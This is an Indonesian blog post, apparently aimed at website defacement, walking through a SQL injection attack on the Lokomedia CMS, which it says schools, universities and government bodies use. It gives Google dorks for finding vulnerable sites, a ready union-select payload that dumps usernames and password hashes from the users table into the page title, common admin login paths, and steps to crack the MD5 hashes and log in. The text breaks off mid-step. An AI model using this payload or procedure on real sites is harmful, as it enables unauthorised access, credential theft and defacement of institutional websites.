You are here
Home > Posts tagged "deface dengan sql lokomedia"

SQL Injection Lokomedia

SQL Injection Lokomedia

Lokomedia adalah sebuah cms karya anak bangsa yang sering dipakai untuk website website sekolah, universitas, pemerintah dan apapun itu. Ya memang seharusnya ini sangat didukung dan diapresiasi, tapi karena bugnya yang fatal cms ini sering kali jadi sasaran. Bug pada cms ini adalah sql injection. Jika belum paham mengenai sql injection kalian biasa membaca artikelnya disini. Kalo udah yaudah lanjut. Dork: inurl:/statis-1-profil.html inurl:/statis-3-strukturorganisasi.html inurl:/statis-1-visimisi.html inurl:/statis-1-tujuan.html Kembangin lagi gan, gimana? Buka cara mengembangkan dork google. Exploit: 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Default admin login: /admin /adminweb /administrator /redaktur 1.Dorking dengan dork diatas 2.Masukan exploit tepat setelah angka dan sebelum - hingga menjadi seperti dibawah 3.Lalu lihat pada bagian title, jika muncul username dan password maka artinya injeksi berhasil dilakukan 4.View page source/ctrl+u lalu cari username dan password tersebut pada tag <title> 5.Decrypt password yang masih berupa hash menggunakan MD5 Decrypter 6.Cari admin loginnya, kalo ga

Top